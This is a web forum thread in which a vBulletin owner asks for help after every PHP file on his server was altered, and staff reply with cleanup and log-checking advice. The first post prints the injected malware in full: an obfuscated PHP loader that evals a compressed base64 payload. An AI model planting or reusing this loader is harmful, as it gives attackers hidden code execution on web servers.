My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • RedFoxy
    Senior Member
    • Sep 2007
    • 233

    [Forum] My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

    Hi all!
    My forum was hacked or similar, I can't use it because all php files are edited and have ALL a code added at above:

    Code:
    <?php$md5 = "2a91cf451e08d33f50a63c22ad76930c";
    $af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
    $bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);
    $bf2('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');
    ?>
    Please check for vulnerabilities!!!
  • Zachery
    Former vBulletin Support
    • Jul 2002
    • 59097

    #2
    There is NOTHING in vBulletin that would allow for any file, let alone all files, to be edited. This is a server issue.

    Comment

    • whitey10tc
      Senior Member
      • Jan 2011
      • 415
      • 4.0.x

      #3
      Yes a server issue. Find how the server was accessed and fix it. Then move on to fixing the files. Best bet is remove the infected and reload.
      www.cdmagurus.com
      www.cellphone-gurus.com

      Comment

      • RedFoxy
        Senior Member
        • Sep 2007
        • 233

        #4
        any suggest to find it?

        Comment

        • ericfahey
          New Member
          • Nov 2011
          • 13
          • 4.1.x

          #5
          Originally posted by RedFoxy
          any suggest to find it?
          Ask your host for ftp logs.

          Comment

          • Lynne
            Former vBulletin Support
            • Oct 2004
            • 26255

            #6
            Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools &lt;- awesome site for html/css help

            Comment

            • RedFoxy
              Senior Member
              • Sep 2007
              • 233

              #7
              Originally posted by ericfahey
              Ask your host for ftp logs.
              I've no FTP

              Originally posted by Lynne
              Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.
              Looks like that's a vulnerability of php because I found other website on my server with php edited

              - - - Updated - - -

              I looked for access by ssh but nothing, all logs are ok

              Comment

              • borbole
                Senior Member
                • Feb 2010
                • 3074
                • 4.0.0

                #8
                Originally posted by RedFoxy
                I've no FTP

                Looks like that's a vulnerability of php because I found other website on my server with php edited
                In that case ask your host to upgrade the php in their server. They should be using the latest version of it.

                To clean up your forum files, overwrite them with a fresh set from your version of vb which you can download from your customer area. Also check your server space for anything out of ordinary such as files with malicious codes left behind and things of that kind.

                Comment

                • RedFoxy
                  Senior Member
                  • Sep 2007
                  • 233

                  #9
                  it was more hard to do it because it changed ALL .php files of all websites

                  Comment

                  • G.I.JOE*MFA*
                    Member
                    • Jun 2002
                    • 61
                    • 4.1.x

                    #10
                    any modifications added? look for vulnerabilities there

                    the rest of the mod community would be very interested if you discover a bad mod

                    Comment

                    • Wayne Luke
                      vBulletin Technical Support Lead
                      • Aug 2000
                      • 73976

                      #11
                      Originally posted by RedFoxy
                      it was more hard to do it because it changed ALL .php files of all websites
                      Some vulnerability on your server allowed them to upload a script somewhere. The script does a listing of all php files and adds its code to the top. This is pretty basic stuff in all reality. Not very difficult to do.

                      Even if you don't use FTP on the site they can get in via FTP if the daemon is running. They can get passwords from email, FTP, or telnet. Someone else on the server could upload a vulnerability. There could be problems in Apache, PHP, MySQL, Java or even the server kernal that needs to be updated. Quite a few hundred places to look on a typical server for vulnerabilities.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment

                      • Hartmut
                        Senior Member
                        • Nov 2007
                        • 2870
                        • 4.2.x

                        #12
                        There has been a browser plugin from adobe which had exploits and due to that it was possible to access ftp programs and transfer the site informations + passwords to third party. Check if you have your browser plugins updated and change all passwords to each ftp site.
                        No private support, only PM me when I ask for it. Support in the forums only.

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...